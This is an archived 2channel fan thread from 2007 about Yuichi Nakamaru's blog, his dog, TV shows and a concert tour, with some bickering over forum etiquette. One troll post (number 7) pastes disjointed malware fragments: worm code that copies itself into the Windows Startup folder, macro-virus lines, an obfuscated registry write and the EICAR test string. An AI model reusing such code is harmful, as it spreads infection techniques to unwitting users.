2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

おかしいと思ったら65枚目だこれ

1 :(冫、 ):2007/02/08(木) 23:27:40 ID:PVi4F0ed
シリーズ第65弾に突入しましたしー。
いよいよ待望の全国ツアーも決まりましたしー。
ユータチも少蔵もラジオもマヌアルも○ペーもミスターのご飯粒も馬のタテガミの刺身もチェキヨロですしー。
みんなでテケトーにマターリでもsage進行だけはテケトー不可でやっていきたいですしー。

※おやくそくですしー※
初心者は必ず↓を見てホスィですしー。
【Jr板 初心者案内】ttp://page.freett.com/zunia/index.htm
比較・同人・下ネタ禁止ですしー。
お花畑はほどほどに、萌えすぎにも注意ですしー。
カ○エエ、カ○イイは伏字表記。2chらしくない顔文字も禁止ですしー。
オリキ話・返信話は該当スレでおながいですしー。
他スレ・ユニスレで担名乗り禁止ですしー。
他スレも不干渉ですしー。
書き込む前にもう一度自分の書いた文を見直して欲しいですしー。
ちなみに禿てませんしー。

前スレ 愛犬転倒64回目
ttp://tv9.2ch.net/test/read.cgi/jr/1161683154/

今までの過去ログですしー。
〜 ○ 中丸雄一の広場 ● 〜
1〜55 ttp://jbbs.livedoor.jp/bbs/read.cgi/music/1521/1105007438/116
56 ttp://tv7.2ch.net/test/read.cgi/jr/1116147353/
57 ttp://tv7.2ch.net/test/read.cgi/jr/1119402808/
58 ttp://tv7.2ch.net/test/read.cgi/jr/1124021181/
59 ttp://tv7.2ch.net/test/read.cgi/jr/1130418113/
小鳥の唐揚げ60羽 ttp://tv7.2ch.net/test/read.cgi/jr/1138020063/
鼻水平野61ヘクタール ttp://tv7.2ch.net/test/read.cgi/jr/1143830606/
バスタオル巻いて巻かれて62枚目 ttp://tv7.2ch.net/test/read.cgi/jr/1147871843/
4年3組代表63試合目 ttp://tv7.2ch.net/test/read.cgi/jr/1153246412/

2 :ユー&名無しネ:2007/02/08(木) 23:40:35 ID:7SAunT26
>1
姐さん乙!

3 :ユー&名無しネ:2007/02/09(金) 01:00:30 ID:ZMoMN6gH
>1


4 :ユー&名無しネ:2007/02/09(金) 07:46:22 ID:tj42qGGR
乙(*´∀`)ノシ

5 :ユー&名無しネ:2007/02/09(金) 14:36:10 ID:KLO2UfeZ
^^

6 :ユー&名無しネ:2007/02/09(金) 16:27:59 ID:Y30hIRgC
>1乙だが、激しくゴミ付きなのはつっこまない方向?

7 :ユー&名無しネ:2007/02/09(金) 19:46:42 ID:feM5oJLy
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


8 :ユー&名無しネ:2007/02/10(土) 22:52:11 ID:YneQem8f
>1 (冫、 )つ旦~
タテガミ乙カレー!

9 :ユー&名無しネ:2007/02/11(日) 00:38:35 ID:2ShExa3F
^^

10 :ユー&名無しネ:2007/02/11(日) 00:43:43 ID:6bWN/D9c
姐さん乙


11 :ユー&名無しネ:2007/02/11(日) 10:56:44 ID:QGBsWxdR
乙!

それにしてもゴミ付きが
かなり気になるんだが…

12 :ユー&名無しネ:2007/02/11(日) 12:47:25 ID:946lYRcA
姐さん乙!

13 :ユー&名無しネ:2007/02/11(日) 13:20:30 ID:AgYYBq2E
>11姐さんは>6姐さんのゴミを言ってるのか?
ちなみに>1のお約束の。は問題ナス前スレとかロムってみたらいいとオモ

14 :ユー&名無しネ:2007/02/12(月) 14:45:08 ID:xLf15JNp
もう前スレ落ちたの?
見つからなくなったんだけど

15 :ユー&名無しネ:2007/02/12(月) 15:46:25 ID:Eh1YO7ht
>14
オモタ
昼過ぎまでは見れてたのに
もう落ちるなんて不思議棚

16 :ユー&名無しネ:2007/02/12(月) 16:38:13 ID:JZkPHVu/
乙です( ・∀・)っ旦~
やっと専ブラで来れたよママン

17 :ユー&名無しネ:2007/02/12(月) 22:00:41 ID:VXxumbsM
>1
乙(*´∀`)つ■チョコドゾー

○ペーの手抜きっぷりにワロタ
でも一回もサボらずにガンガってるのはエロイ
しかしブーツ写真はなんであんな暗がりなのか(w
撮る直前まで履いてて急いで移動中に脱いで撮影したのか?
○タソのぬくもりハァ━━━ *´Д(ry

18 :ユー&名無しネ:2007/02/12(月) 22:52:47 ID:kNFZS75Y
>17
(*´∀`)σ)゚Д゚)
関係ないがあれがモノクロ写真に見えるんだが目おかしいのだろうか

19 :ユー&名無しネ:2007/02/13(火) 02:06:03 ID:wHHk0pdz
>18
モノクロ加工してあるとオモ
気のせいだろうがあれ一瞬トイレの床に見えてしまた(w

20 :ユー&名無しネ:2007/02/13(火) 11:23:02 ID:hRlXKHwd
>19
バロス(w
でも見えなくもない

21 :ユー&名無しネ:2007/02/14(水) 01:57:04 ID:VhGig11p
>19
ナカーマ
自分も最初ト(ryの床だとオモってテラ焦った
この間の愛息子といい今回のト(ryといい自分もうダメかも試練(ノ∀`)

22 :ユー&名無しネ:2007/02/14(水) 18:19:38 ID:hLssd4x9
○ペー更新されないね(´・ω・`)
どっかでみた海外に行ってるって本当だったりするのかな

23 :ユー&名無しネ:2007/02/14(水) 18:29:19 ID:0/gMjrpU
○タソついにおサボりkt?
最近ネタ切れ気味だったしなorz

24 :ユー&名無しネ:2007/02/14(水) 21:51:03 ID:jEy8hpJ3
〇ペーの写真うpできなかったから遅れたんジャマイカ?

25 :ユー&名無しネ:2007/02/15(木) 00:40:20 ID:g3Y1XOst
自由に喋くる爺がみたいです
なるほどが多いしいっぱいいっぱいすぎて アプアプする

26 :ユー&名無しネ:2007/02/15(木) 01:03:12 ID:WLPzj3QN
写真うpできないのはどうしてなんだ
○タソに連絡が取れなかったのか○タソのミス?
海外もありうるのかとチラッと期待してしまう(*´∀`)
謎のハワイみたいに海外に逝ったから仕事とも限らないの鴨しれんがorz

27 :ユー&名無しネ:2007/02/15(木) 01:05:40 ID:zuPcKAgG
>24
「〇ペー」じゃなくて「○ペー」でヨロ

禿遅れたにしろ今回も無事に○ペー更新されてヨカタ(*´∀`)
写メなんて義務じゃないんだから急いでる時は
そ知らぬ顔で文章だけうpすればいいのに
○タソ変なところで生真面目だな(w

28 :ユー&名無しネ:2007/02/15(木) 07:49:11 ID:rySiw4A+
>27
普段テケトーなのにな(*´∀`)
まぁそれが○タソクオリティー(w

29 :ユー&名無しネ:2007/02/15(木) 19:26:33 ID:Ktc8vci3
Webの∞レンジャーに爺登場モエ

30 :ユー&名無しネ:2007/02/15(木) 19:27:32 ID:VdqPpoEL
レンジャー親分に○タソktkr

31 :ユー&名無しネ:2007/02/15(木) 19:36:59 ID:VVE7M+Bl
>27 スマソorz

32 :ユー&名無しネ:2007/02/15(木) 23:03:29 ID:WLPzj3QN
ナッカムテラワロス_| ̄|○ノシ
○タソ上辺の口約束じゃなくて食事に誘いなさい(w
○ペーで何かしら反応あるといい脳(*´∀`)
波で交流すればネタも増えるよきっと

33 :ユー&名無しネ:2007/02/16(金) 19:18:10 ID:V0j2M/7Q
○タソ…今日の○ペー超テケトー棚オイ(w
しかも親分シカト…orz


34 :ユー&名無しネ:2007/02/17(土) 03:13:14 ID:oc07fDOp
>>33
日記書いたのが親分のより早かったからジャマイカ?
次回wktk

35 :ユー&名無しネ:2007/02/17(土) 12:00:37 ID:vlNlJQ6E
>34
ハイパーになってるよ

写真がまだうpされないのが木になる木
しかもフィレステーキどんだけ食ってんだよ!(w
○タソ流ボケなのかそれとも水金は同じ日にでも書いたのか?
どーでもイイが大富豪は自分も強い(*´∀`)

36 :ユー&名無しネ:2007/02/17(土) 23:58:41 ID:meTK1qOy
>35
写真の事はもう忘れてるにミスターのご飯粒1000粒賭けてもいい(*´∀`)
○タソちゃんと親分にお返事して呉れよ(w

37 :ユー&名無しネ:2007/02/18(日) 22:37:27 ID:/YkMfxlM
ミスターご飯粒だらけ棚(w
○タソ写真の行方を教えてクレヨン

38 :ユー&名無しネ:2007/02/18(日) 22:58:28 ID:1YGLVSt2
今日の夕立でタカトシのネタを見てる笑顔の○タソに禿癒された(*´∀`)

39 :ユー&名無しネ:2007/02/19(月) 00:23:47 ID:LWudYNUS
ID記念パピコ
〇タソソロしびれました(*´∀`)

40 :ユー&名無しネ:2007/02/19(月) 00:32:52 ID:XNIqpegU
>38
ナカーマル(冫、 )人(冫、 )ナカーマル
あとお財布持ちながら顔かいてる時の指に萌えますた(*´∀`)
途中でかなり変な顔になってたけど(w

41 :ユー&名無しネ:2007/02/19(月) 13:22:32 ID:EDPc/cBH
今週関東に行く予定があるので
初めて夕立見れるとオモてたのに
25日夕立なしって

ついてないな俺…orz

42 :ユー&名無しネ:2007/02/19(月) 13:36:51 ID:tDhg079a
>41
兄さんktkr?
丼舞

43 :ユー&名無しネ:2007/02/19(月) 21:38:25 ID:Qok6vEnH
○ペー
みんなでご飯ってねねこも一緒だよなorz
最後の一緒にお仕事した〜もねねこ宛てなんだろうなorz

44 :ユー&名無しネ:2007/02/19(月) 21:57:10 ID:WJKZ9HLx
ムスターがキャワすぎて辛い(*´∀`)

45 :ユー&名無しネ:2007/02/19(月) 23:39:22 ID:tDhg079a
ムスターの写真に映りこんでる手はパパソの手かのう(*´∀`)
しかし一週間も入浴だなんて○タソ裏山
紺のパンフが楽しみになってきたwktk
しかしなんか紺楽しみなヲタみたいな○タソワロス(w

46 :ユー&名無しネ:2007/02/19(月) 23:41:39 ID:tDhg079a
連投スマソorz
見なおしたら手じゃなくて骨(餌)だた
○タソパパソ骸骨扱いして爺スマソ

47 :ユー&名無しネ:2007/02/19(月) 23:59:39 ID:bCYBFbxS
スタフと別々のバンで移動とか仮にねねこ居たとしても
事務所露骨に麺とスタフの余分な接触を警戒してるぽくてワロス
つーかメッセがねねこ宛てならいちいちあそこに晒さずに
直接メールなり電話なりするでそ
ねねこのせいで一人暮しバレた時ラジヲであれだけ言い訳してた爺が
またヲタから突っ込み入れられるような危険をワザワザ侵すとも思えん

48 :ユー&名無しネ:2007/02/20(火) 00:03:42 ID:YYX4eQGi
紺パンフ楽しみだ!
○ペ-読んで想像したら自分の中では
○タソだいぶビズ良くてカ○イイ仕上がり
になるはずだ(w

49 :ユー&名無しネ:2007/02/20(火) 00:15:54 ID:gZ4LGSRp
○タソて一人暮らしなの?つーかねねこって誰?

50 :ユー&名無しネ:2007/02/20(火) 00:45:41 ID:VrcfBBSt
>46
姐さんバロス(w

51 :ユー&名無しネ:2007/02/20(火) 01:11:37 ID:wtCIMJeR
待て状態のミスターキャ○なのに相変わらず変に哀愁漂っててバロス(*´∀`)
そして親分の事はまだ放置プレイ中なん棚(w
と言うかひょっとして○タソてばレンジャーちゃんと見てなくて
親分があれ書いたのにまだ気が付いてないんジャマイ(ry

52 :ユー&名無しネ:2007/02/20(火) 03:13:13 ID:jFywuR92
>51
さすがにそんな事はないと思いたい(ノ∀`)
自分も今度の紺パンフwktk
関係無いけどNYと聞いて写真集思い出したよ
パンフであの時みたく○タソにまたパフェ食べてホスィ(w

53 :ユー&名無しネ:2007/02/20(火) 07:52:57 ID:R8dooE4x
>51-52
フツーに気付いてないとおも…
○タソ!ムスターだけじゃなく人間とも交流汁!

54 :ユー&名無しネ:2007/02/20(火) 07:55:27 ID:4ub2U4Ap
>51
見てないんじゃなくて実は
本気で親分放置プ(ry
…○タソ時々ドSだからな(w


55 :ユー&名無しネ:2007/02/20(火) 20:14:23 ID:8rFk5CtZ
>47
ねねこの日記の事知って一人暮らしをラジオで言い訳してるのかと思ったけど
その後○ペーでJ犬大きくなりますように年賀状でねねこの事知らないでFA出たんじゃなかった?

それにスタフとタレの接触避けるのは昔から
ねねこも日記に
『上から仕事以外では関わらないように言われてるのにUDとNMに仕事後ご飯とか誘われる
まぁ向こうから誘ってきてるんだからそれは行ってもいいよね?(笑)』
って言ってた

56 :ユー&名無しネ:2007/02/20(火) 22:12:54 ID:qMYbBoz1
>54
ドS○タソモヘ(*´∀`)
案外直接親分にメルで返事してる可能性もあるよな

…ないかorz
あのテラオモシロスなコメントに対する○タソの胡散臭い返事が見たい

57 :ユー&名無しネ:2007/02/20(火) 22:31:36 ID:12KwZlNS
Real ○ペー (真顔替え歌)

○タソページ始めて 退屈なヲタをSHIGEKIしたつもり
ビミョーにからぶり
テケトーな文並べて ありえねーくらい短くても
ヲタは見逃せやしない
食べたモノ書き込んでおけば なんか字数が増える気がして
習慣にした
ギリギリでいつも更新するから Ah いつもドキムネしてるんだ
このごろは○タソの文章より Ah ムスターの写真が楽しみ
リアルにムス担になりそう

58 :ユー&名無しネ:2007/02/20(火) 23:14:31 ID:eOBDQJq5
ムスター手に入ーれるーんだー

59 :ユー&名無しネ:2007/02/20(火) 23:21:09 ID:3TtJa9Do
アテクシとっくにムス坦

60 :ユー&名無しネ:2007/02/20(火) 23:31:06 ID:6clEUMnF
>59
ナカーマ(w

61 :ユー&名無しネ:2007/02/21(水) 00:22:44 ID:Tp0kqMhp
>60
自演か

62 :ユー&名無しネ:2007/02/21(水) 00:27:44 ID:6dMUcxOr
ポーサンktkr

63 :ユー&名無しネ:2007/02/21(水) 21:32:36 ID:Tp0kqMhp
ムスターの後ろ姿とキャワな顔文字にモヘ_| ̄|○ノシ
○タソがとった写真を紺パンフにいれてホスィ
きっと麺の素顔満載(*´∀`)

64 :ユー&名無しネ:2007/02/21(水) 22:58:39 ID:xqHIWi39
^^

65 :ユー&名無しネ:2007/02/21(水) 23:57:28 ID:mnkvwhh1
爺さんのサマリーのチ○コのデカさにびびったヤシが素通りします・・・

66 :ユー&名無しネ:2007/02/22(木) 01:30:55 ID:nKvRWtcQ
○ペーもマンネリでいよいよ本格的にネタ切れてきたな(ノ∀`)
○タソは一度イイやりすごし方を覚えるとMCの時の「なるほど」みたいに
そればっかり連発してもう新しいやりすごし方考えようと工夫しないのイクナイ
ここらで一発ミスターと食べ物日記以外の新パターンの○ペー(-人-)ナモナモ

67 :ユー&名無しネ:2007/02/22(木) 02:51:41 ID:X2VOAV0f
新番組決定
ttp://m.pic.to/8yx6c

68 :ユー&名無しネ:2007/02/22(木) 08:07:27 ID:SXsUNIAK
冠キタ━━━(゚∀゚)━━━!!!!!
明日の○ペーwktk
親分への返事も待ってるよ○タソ!

69 :ユー&名無しネ:2007/02/22(木) 14:04:41 ID:bY2vRW7/
>66
浮いてる

70 :ユー&名無しネ:2007/02/22(木) 14:59:22 ID:JUb3u4KG
>69
過敏杉る自治もイラネ

冠オメ(*´∀`)
紺も始まるし冠も始まるし4月来るのがwktk
とりあえず自分も明日の○ペー楽しみだ


71 :ユー&名無しネ:2007/02/22(木) 19:46:09 ID:YmJBzGGv
冠楽しみ(*´∀`*)
明日の○ペーも楽しみだ

親分に早く返事してやれ○タソ(w

ザワイの○タソ髪ぼさぼさだたな

72 :ユー&名無しネ:2007/02/22(木) 21:06:49 ID:SXsUNIAK
WSのビズ悪いよなorz
まるで寝起きのような○タソ(w
ヤパーリ髪はちゃんとセットした方がイイ

73 :ユー&名無しネ:2007/02/22(木) 21:30:32 ID:YmJBzGGv
>72
ここだけの話○タソが禿ブサに見えた(w

髪は大事だよな

74 :ユー&名無しネ:2007/02/22(木) 22:15:26 ID:SXsUNIAK
ヌッチャケ○タソはブ(ry だとオモ
でもたまに禿カコイクてそれに翻弄されてる自分(w

75 :ユー&名無しネ:2007/02/22(木) 23:25:09 ID:f8l6P+2h
他担だがスッキリで一人だけ動きの合ってなかった爺にテラ萌えますた…

76 :ユー&名無しネ:2007/02/23(金) 00:43:35 ID:uV6YL7Yv
>75
他担姐さんいらっさいませ(*´∀`)つ旦~
良かったらちゃんと動きが合ってる時の○タソもヨロ(w

自分も○タソがヌサイクなのは百も承知してるはずなのに
最近それを思い出す事が減ってきてヤヴァス
湿気多い日とかにはテラ思い出すけど(w

77 :ユー&名無しネ:2007/02/23(金) 01:55:23 ID:p2tLcMH8
○タソってビズの良し悪しが激しすぎるとオモ

78 :ユー&名無しネ:2007/02/23(金) 06:43:33 ID:W/eKmODt
>77
でもそんな不安定なところがツボ(*´∀`)

○タソはヤパーリドラマ来なかったな(w

79 :ユー&名無しネ:2007/02/23(金) 09:45:53 ID:LBLxUYE4
自分の中で至上最高の○タソビズはデブ前のカツンとしてMステ初登場の時


80 :ユー&名無しネ:2007/02/23(金) 11:58:43 ID:hcrFk653
自分は無印夢男のときが(*´∀`)

81 :ユー&名無しネ:2007/02/23(金) 12:53:34 ID:jD19uz/F
>79
あそこらへんのビズ隙だ (。・_・。)ノ

髪も頑張ってたよな

年を重ねるうちに髪にやる気を感じられなくなた

82 :ユー&名無しネ:2007/02/23(金) 14:04:35 ID:AWtVbOSU
>81
厨臭いAAとか行間ムダに一行空けるとか
オマイのレス少し前から浮いてるからロムって


83 :ユー&名無しネ:2007/02/23(金) 15:22:19 ID:vyYVxi7q
○タソついにサボりかorz
○ペー禿wktkしてたのに

84 :ユー&名無しネ:2007/02/23(金) 16:56:10 ID:NGsLmXnT
え、まだ時間早いからサボりじゃないでそ


85 :ユー&名無しネ:2007/02/23(金) 18:04:16 ID:jD19uz/F
>81
少し前っていつ
(。・_・。)ノこれ○タソが使ったからネタなのにオマイネタも分からないのか

86 :ユー&名無しネ:2007/02/23(金) 18:22:40 ID:9V56lsw+
パイロン挟まったまま車出す○タソワロス(w

87 :ユー&名無しネ:2007/02/23(金) 18:30:06 ID:W/eKmODt
>85
もちつけ
つ旦

88 :ユー&名無しネ:2007/02/23(金) 18:47:42 ID:jD19uz/F
人に見られたくない格好が気になる(*´∀`)

89 :ユー&名無しネ:2007/02/23(金) 19:01:51 ID:qeOsVmbO
>85
○タソAAが厨クサーて事か(w
○ペー見てる○タソ担なら分かるから大丈夫だよ
>88
(*´∀`)人(´∀`*)
もっさりしてジャージとか履いてたのか脳
親分への返事があってヨカタ
ケキョーク食事に行く気があるのかないのか(w

90 :ユー&名無しネ:2007/02/23(金) 19:14:41 ID:CVWhKqK9
折角握手してカッコ良く立ち去ろうとしたのに
パイロン付けたままサンダーバード状態で発車って
あまりにも○タソクオリティーに溢れててバロス(w

91 :ユー&名無しネ:2007/02/23(金) 20:00:38 ID:NGsLmXnT
○タソ禿バロス(w
髪ぼさぼさな上にあんま見られたくない格好で
どこに買い物行く気だったよ
あと親分返事もらえてヨカタな

92 :ユー&名無しネ:2007/02/23(金) 20:02:29 ID:NGsLmXnT
×だったよ
○だったんだよ

スマソ…orz

93 :ユー&名無しネ:2007/02/23(金) 20:46:26 ID:f8TpiTR/
>82がいちばん厨くさい件
オマイもその無駄な空白何とかしろよ

94 :ユー&名無しネ:2007/02/23(金) 21:00:50 ID:CVWhKqK9
結構どっちもどっちだとオモーけどな

○ペー冠に何か触れるかとオモテたのにスルーで残念
次回に乞うご期待なの可能

95 :ユー&名無しネ:2007/02/23(金) 21:25:44 ID:jD19uz/F
空気悪くしてスマソ
氏んでくるノシ

17 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)